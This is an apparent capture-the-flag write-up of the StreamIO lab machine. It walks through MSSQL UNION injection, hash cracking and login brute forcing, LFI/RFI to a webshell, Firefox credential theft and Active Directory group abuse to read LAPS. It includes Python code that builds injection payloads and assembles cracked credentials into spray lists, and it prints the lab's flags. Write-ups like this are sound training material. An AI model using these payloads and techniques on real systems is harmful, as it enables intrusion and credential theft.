Last updated
StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection used to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code of the administration pages and leads to a remote file inclusion vulnerability; abusing it gains us access to the system. After the initial shell we use the SQLCMD command-line utility to enumerate databases and obtain further credentials for lateral movement. As the secondary user we find a Firefox profile whose database lets us extract saved credentials. Using the new credentials in BloodHound we discover that the user can add themselves to a specific group that is allowed to read LDAP secrets. Without direct access to that account, we use PowerShell to abuse this right, add ourselves to the `Core Staff` group, and then query LDAP to disclose the administrator's LAPS password.
Scope
IP Address: 10.10.11.158
Nmap Scan
Before I start the enumeration process, I will update /etc/hosts with the hostnames from the Nmap script output.
DNS Enumeration
I tried a zone transfer, but it failed.
RPC & SMB Enumeration
I got access denied when enumerating both services.
KERBEROS Enumeration
Then I attempted username enumeration, looking for a possible path in, but again found nothing.
HTTP & HTTPS enumeration
http://10.10.11.158
https://10.10.11.158
I tried fuzzing subdomains over HTTP but found nothing; however, when I tried subdomain fuzzing against the HTTPS service, I got a hit.
https://watch.streamIO.htb
I looked at Wappalyzer to see what technology is being used, and PHP took my attention, as it's not common to run PHP on IIS. So I attempted directory fuzzing against https://watch.streamIO.htb, and also fuzzed for PHP files on https://streamIO.htb.
https://streamIO.htb/login.php
I don't have any credentials yet, so I will come back to this page if I obtain some.
https://watch.streamIO.htb/search.php
It's a search function that looks up film names in a table, so there is a database behind it and we can attempt SQL injection.
When I delivered a simple payload, I got blocked by some security defence in place:
blocked.php
So I can't use SQLMap, and I will continue manually.
Something interesting took my attention here: when I type a word like man, it is matched from both sides. It returns Batman and Anger Management, so the query uses a wildcard on each side of the term, like %man%.
The SQL query is probably something like this:
I can break the query with an input like ';-- and I was right: when I typed man';-- only the leading wildcard was still in effect (it matched names ending in man), because the quote terminates the string and -- comments out the trailing %'.
Let's create our exploit. I tried UNION SELECT 1,2,... until I got a hit at UNION SELECT 1,2,3,4,5,6, so the original query returns six columns. Field 2 is reflected in the page, so I will inject into it.
So we're dealing with an MSSQL database; we can use commands from this cheat sheet:
Get the user name:
Current Database:
We're on an MSSQL database, so one common attack vector is to make the server authenticate to a host we control and capture the NetNTLM hash of the account it runs as, by executing the following command. I did it, but it failed: I got the machine account's hash, which couldn't be cracked.
Continue exploring the database. We're already in STREAMIO, so let's explore its tables.
When I provided an asterisk * it didn't return anything, but when I provided username it returned a list of usernames, and when I provided password it returned a list of hashes. I can't copy and paste them one by one; that's a waste of time.
I looked at Burp to see which HTML tag the hashes are wrapped in, so I can use a curl command to fetch the list of hashes and filter the results. I will do the same thing for the usernames.
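As an added example (this is not the author's curl command or any code from the page), the Python below builds the UNION payloads for the six-column, field-2 injection described above and does the same filtering of the HTML that was done here with curl and grep. It goes slightly beyond the page by also building the MSSQL fingerprint and table-listing payloads. The query shape, the h5 tag, the users table name and the sample response are all assumptions, since the page shows none of them:

```python
import re
from html import unescape

# Assumed shape of the query behind search.php (the page does not show it):
#   SELECT ... FROM movies WHERE name LIKE '%<term>%'
# A single quote in <term> closes the string literal, and ';--' comments out
# the trailing %' so MSSQL never sees it.

COLUMN_COUNT = 6       # hit at UNION SELECT 1,2,3,4,5,6 (from the writeup)
REFLECTED_COLUMN = 2   # field 2 is echoed back into the page (from the writeup)


def union_payload(expression, source=None, where=None,
                  column_count=COLUMN_COUNT, reflected=REFLECTED_COLUMN):
    """Build the injected search term.

    `expression` goes in the reflected column; every other column gets a
    numeric placeholder so the UNION has matching arity. `source` is an
    optional table for the FROM clause and `where` an optional filter.
    """
    cols = [str(i) for i in range(1, column_count + 1)]
    cols[reflected - 1] = expression
    payload = "x' UNION SELECT " + ",".join(cols)
    if source:
        payload += " FROM " + source
    if where:
        payload += " WHERE " + where
    return payload + ";--"


def extract_values(html, tag="h5"):
    """Return the text inside every <tag>...</tag> in the response.

    This is the filtering the writeup did by piping curl through grep. The
    tag name is an assumption: pass whatever Burp shows wrapping the results.
    """
    pattern = re.compile(r"<%s\b[^>]*>(.*?)</%s>" % (tag, tag), re.S)
    return [unescape(m).strip() for m in pattern.findall(html)]


def harvest(response_html, tag="h5"):
    """Deduplicate the extracted values while keeping first-seen order, so the
    result can be written straight out as a wordlist."""
    seen, out = set(), []
    for value in extract_values(response_html, tag):
        if value not in seen:
            seen.add(value)
            out.append(value)
    return out


# Constructed response standing in for what search.php returns for the
# username payload; not a capture from the machine.
SAMPLE_RESPONSE = """
<div class="card"><h5 class="card-title">admin</h5></div>
<div class="card"><h5 class="card-title">alice</h5></div>
<div class="card"><h5 class="card-title">admin</h5></div>
<div class="card"><h5 class="card-title">bob &amp; co</h5></div>
"""

if __name__ == "__main__":
    # Fingerprint, then list user tables, then dump a column. 'users' is an
    # assumed table name; the page does not name the table it read from.
    print(union_payload("DB_NAME()"))
    print(union_payload("name", source="sysobjects", where="xtype='U'"))
    print(union_payload("username", source="users"))
    print(harvest(SAMPLE_RESPONSE))
```

The placeholder numbers only work when the original query's columns accept integers or the reflected column is a string type; if the server complains about type conversion, swap the placeholders for NULL.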
The username list is too big for brute forcing, so I will try to find out who really has an account on the machine by enumerating Kerberos.
I got a user list and a hash list. Let's attempt to crack the hashes and then try brute forcing.
First, start hashcat in auto-detection mode to identify the hash type.
Not all the hashes cracked, but we will be fine with what we found.
Creating a password list for brute forcing
Unfortunately, I didn't get a hit when I tried brute forcing
I remember the login.php page that I left behind because I didn't have any credentials. Intercept the request, send it to Intruder, and start the attack with the passwords we have.
Fuzzing for the /admin directory and its parameters
https://streamio.htb/admin/master.php
There is a missing parameter or something; let's try parameter fuzzing.
https://streamio.htb/admin/?debug=
I tried LFI in this parameter and got a hit: https://streamio.htb/admin/?debug=C:\Windows\System32\drivers\etc\hosts
I will use this vulnerability to read the content of master.php using the php://filter wrapper, which base64-encodes the file so its source is returned instead of being executed.
The file checks that it is being included rather than requested directly. Looking at the end of the code, it takes its input from an include parameter in a POST request.
I will include master.php via https://streamio.htb/admin/?debug= and append the include parameter to the POST request to meet those conditions.
We found LFI before, but RFI didn't work on the debug= parameter, so I will try RFI on the include parameter. We got a hit; let's create a webshell.
I looked around, found login.php and decided to explore its content. I searched for other passwords that might exist and found one: it's a password for the MSSQL database. Let's examine the DB with the SQLCMD tool.
Shorten our user list by keeping only the usernames that actually exist on the system. Only one hash was cracked, so it must belong to one of the two users.
Confirm:
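The two steps above (filtering the user list down to accounts that actually exist, and matching the single cracked hash back to its user) and the earlier password-list creation after hashcat are really one join between three lists. Here is an added example that does it in Python; it is not the author's script, all the data is constructed, MD5 is assumed for the sample hashes (use whatever type hashcat identified), and the valid-user list stands in for the Kerberos enumeration output:

```python
import hashlib


def parse_pairs(lines):
    """Parse 'left:right' lines into (left, right) tuples, skipping blanks.

    Works for the DB dump (username:hash) and for hashcat --show output
    (hash:plain). Only the first ':' splits, so plaintexts containing ':'
    survive intact.
    """
    pairs = []
    for line in lines:
        line = line.strip()
        if not line or ":" not in line:
            continue
        left, right = line.split(":", 1)
        pairs.append((left.strip(), right.strip()))
    return pairs


def correlate(user_hash_lines, potfile_lines, valid_users=None):
    """Return [(user, password)] for every DB user whose hash was cracked.

    valid_users: optional usernames confirmed to exist (e.g. the Kerberos
    enumeration output). When given, users outside it are dropped, which is
    the 'shorten the list' step; matching is case-insensitive because
    Windows logons are.
    """
    cracked = {h.lower(): pw for h, pw in parse_pairs(potfile_lines)}
    valid = {u.lower() for u in valid_users} if valid_users is not None else None
    creds = []
    for user, h in parse_pairs(user_hash_lines):
        if valid is not None and user.lower() not in valid:
            continue
        password = cracked.get(h.lower())
        if password is not None:
            creds.append((user, password))
    return creds


def spray_wordlist(potfile_lines):
    """Unique cracked plaintexts in first-seen order, for spraying logins."""
    seen, words = set(), []
    for _, pw in parse_pairs(potfile_lines):
        if pw not in seen:
            seen.add(pw)
            words.append(pw)
    return words


def md5(text):
    # MD5 is assumed for the sample; use whatever type hashcat identified.
    return hashlib.md5(text.encode()).hexdigest()


# Constructed sample data; none of it comes from the machine.
DB_DUMP = [
    "admin:" + md5("Winter2022!"),
    "alice:" + md5("Password1"),
    "bob:" + md5("pa:ss:word"),
    "carol:" + md5("long-uncracked-passphrase-xyz"),
]
HASHCAT_SHOW = [            # what `hashcat --show` prints for the cracked ones
    md5("Winter2022!") + ":Winter2022!",
    md5("Password1") + ":Password1",
    md5("pa:ss:word") + ":pa:ss:word",
]
DOMAIN_USERS = ["Alice", "carol", "dave"]   # e.g. kerbrute's valid-user output

if __name__ == "__main__":
    print(correlate(DB_DUMP, HASHCAT_SHOW))                # all cracked pairs
    print(correlate(DB_DUMP, HASHCAT_SHOW, DOMAIN_USERS))  # only real accounts
    print(spray_wordlist(HASHCAT_SHOW))
```

Feed the DB dump and the `hashcat --show` output in as files and the first call gives the credentials to try against the web login; the second, restricted to accounts that exist in the domain, gives the ones worth trying for a shell.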
User Flag: a00c4e521d2bed26c166xxxxxxxxxxxxx
I found that Mozilla Firefox is installed on the system, so I looked at the user's Mozilla profile and copied it to my Kali machine to try to decrypt the saved Firefox secrets and cookies.
Start SMB Server
I changed into the directory I copied from the Windows box and started firepwd.py to decrypt the Firefox secrets.
I found some credentials; let's try them by brute forcing the accounts.
I fired up BloodHound to see what the user JDgodd can do and found the following: JDgodd has WriteOwner on the CORE STAFF group, which lets us take ownership of the group, grant ourselves rights on it and add ourselves to it; the CORE STAFF group has the right to read the LAPS password of the DC machine.
Let's list the commands we will use for that purpose:
I personally use crackmapexec to pull the LAPS password.
An alternative way from the community is ldapsearch.
Root Flag: fcca05f1388d18d964521ce53582793